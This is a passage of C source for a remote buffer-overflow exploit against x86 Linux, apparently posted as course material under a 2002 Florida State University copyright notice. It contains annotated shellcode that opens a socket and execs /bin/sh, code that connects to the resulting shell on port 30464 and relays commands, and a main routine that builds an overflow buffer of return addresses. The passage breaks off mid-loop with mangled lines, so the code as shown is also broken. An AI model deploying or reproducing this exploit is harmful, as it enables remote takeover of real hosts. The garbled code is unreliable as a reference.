	"\xeb\x5b"                      /* jmp 0x5b              */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x04"                      /* movb $0x4,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x05"                      /* movb $0x5,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x88\xc3"                      /* movb %al,%bl          */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x01"                      /* movb $0x1,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x02"                      /* movb $0x2,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\x5b\xff\xff\xff";         /* call -0xa5            */

unsigned long get_sp(void)
{
	__asm__("movl %esp,%eax");
}

long getip(char *name)
{
	struct hostent *hp;
	long ip;
	if((ip=inet_addr(name))==-1)
	{
		if((hp=gethostbyname(name))==NULL)
		{
			fprintf(stderr,"Can't resolve host.\n");
			exit(0);
		}
		memcpy(&ip,(hp->h_addr),4);
	}
	return ip;
}

int exec_sh(int sockfd)
{
	char snd[4096],rcv[4096];
	fd_set rset;
	while(1)
	{
		FD_ZERO(&rset);
		FD_SET(fileno(stdin),&rset);
		FD_SET(sockfd,&rset);
		select(255,&rset,NULL,NULL,NULL);
		if(FD_ISSET(fileno(stdin),&rset))
		{
			memset(snd,0,sizeof(snd));
			fgets(snd,sizeof(snd),stdin);
			write(sockfd,snd,strlen(snd));
		}
		if(FD_ISSET(sockfd,&rset))
		{
			memset(rcv,0,sizeof(rcv));
			if(read(sockfd,rcv,sizeof(rcv))<=0)
				exit(0);
			fputs(rcv,stdout);
		}
	}
}

int connect_sh(long ip)
{
	int sockfd,i;
	struct sockaddr_in sin;
	printf("Connect to the shell\n");
	fflush(stdout);
	memset(&sin,0,sizeof(sin));
	sin.sin_family=AF_INET;
	sin.sin_port=htons(30464);
	sin.sin_addr.s_addr=ip;
	if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		printf("Can't create socket\n");
		exit(0);
	}
	if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0)
	{
		printf("Can't connect to the shell\n");
		exit(0);
	}
	return sockfd;
}

void main(int argc,char **argv)
{
	char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
	long addr;
	unsigned long sp;
	int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
	int i;
	int sockfd;

	if(argc>1)
		offset=atoi(argv[1]);

	sp=get_sp();
	addr=sp-offset;

	for(i=0;i>8;
		buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
		buff[i+ALIGN+3]=(addr&0xff000000)>>24;
	}

	for(i=0;i


© 2002 T. P. Baker & Florida State University. No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means without written permission. (Last updated by $Author: cop4610 $ on $Date: 2002/09/02 20:27:19 $.)